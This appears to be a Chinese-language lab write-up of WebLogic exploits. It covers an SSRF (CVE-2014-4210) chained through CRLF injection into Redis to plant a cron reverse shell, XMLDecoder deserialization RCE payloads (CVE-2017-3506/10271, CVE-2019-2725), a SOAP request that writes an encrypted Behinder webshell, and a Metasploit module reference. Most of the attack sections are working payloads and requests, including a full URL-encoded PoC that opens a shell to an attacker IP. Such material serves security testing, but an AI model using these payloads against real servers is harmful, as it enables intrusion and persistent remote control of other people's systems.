1.SSRF漏洞(CVE-2014-4210)
- 影响版本:weblogic 10.0.2 -- 10.3.6.0
- 漏洞位置:
127.0.0.1:7001/uddiexplorer/SearchPublicRegistries.jsp
- 漏洞利用:
在此处随便输入东西后点search后抓包,
红框处位置存在ssrf漏洞,
例如修改为127.0.0.1:7001的回显:
修改为不存在的端口例如8888的回显:
- 漏洞利用2:
结合 %0a%0d来注入换行符 和redis反弹shell
xxx
set asd "\n\n* * * * * sh -i >& /dev/tcp/192.168.111.128/4444 0>&1\n\n "
config set dir /var/spool/cron
config set dbfilename root
save
xxx
将上列命令进行url编码
poc:
http://192.168.111.131:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://172.20.0.2:6379/xxx%0D%0Aset%20asd%20%22%5Cn%5Cn%2A%20%2A%20%2A%20%2A%20%2A%20%20sh%20-i%20%3E%26%20%2Fdev%2Ftcp%2F192.168.111.128%2F4444%200%3E%261%5Cn%5Cn%20%22%0D%0Aconfig%20set%20dir%20%2Fvar%2Fspool%2Fcron%0D%0Aconfig%20set%20dbfilename%20root%0D%0Asave%0D%0Axxx
去redis服务器看一眼
没问题,计划任务写进去了
过一会shell也反弹回来了
2. 命令执行无回显(CVE-2017-3506 & 10271)
- 影响版本:WebLogic 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0, 12.2.1.2.0 版本
- 漏洞位置:
127.0.0.1:7001/wls-wsat/CoordinatorPortType
(POST) - 漏洞利用:
抓包修改请求方式为POST,修改Content-Type为text/xml
post内容:
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"><string>cmd.exe</string></void>
<void index="1"><string>/c</string></void>
<void index="2"><string>calc</string></void>
<!--
<void index="0"><string>/bin/sh</string></void>
<void index="1"><string>-c</string></void>
<void index="2"><string>touch /tmp/shell</string></void>
-->
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
结果会返回500,但实际命令是执行成功的
- 漏洞利用(写webshell):
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java><java version="1.4.0" class="java.beans.XMLDecoder">
<object class="java.io.PrintWriter">
<string>servers/AdminServer/tmp/_WL_internal/bea_wls_internal/9j4dqk/war/shell.jsp</string>
<void method="println"><string>
<![CDATA[
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="xxxxxxxxxxxxxxxx";/*该密钥为连接密码32位md5值的前16位,默认连接密码rebeyond*/session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
]]>
</string>
</void>
<void method="close"/>
</object></java></java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
然后用冰蝎连接http://192.168.111.131:7001/bea_wls_internal/shell.jsp
测试
3.反序列化远程代码执行漏洞(CVE-2019-2725)
- 影响版本:WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
- 漏洞位置:
127.0.0.1:7001/_async/AsyncResponseService
(POST)
(和上一个漏洞利用差不多) - 漏洞利用:
poc
<?xml version="1.0" encoding="utf-8"?>
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:wsa="http://www.w3.org/2005/08/addressing" xmlns:asy="http://www.bea.com/async/AsyncResponseService">
<soapenv:Header>
<wsa:Action>xx</wsa:Action>
<wsa:RelatesTo>xx</wsa:RelatesTo>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0"> <string>cmd.exe</string></void>
<void index="1"> <string>/c</string></void>
<void index="2"> <string>calc</string></void>
<!--
<void index="0"><string>/bin/sh</string></void>
<void index="1"><string>-c</string></void>
<void index="2"><string>touch /tmp/shell</string></void>
-->
</array>
<void method="start"/>
</void>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body>
<asy:onAsyncDelivery/>
</soapenv:Body>
</soapenv:Envelope>
返回结果为202
或者直接使用msf获取shell:
exploit(multi/misc/weblogic_deserialize_asyncresponseservice)
4.任意文件上传(CVE-2019-2618)
- 影响版本:WebLogic 10.3.6.0、12.1.3.0、12.2.1.3
- 漏洞位置:
127.0.0.1:7001/bea_wls_deployment_internal/DeploymentService
(POST) - 利用条件:需知道用户名和密码(很鸡肋)
- 漏洞利用:
(待补充)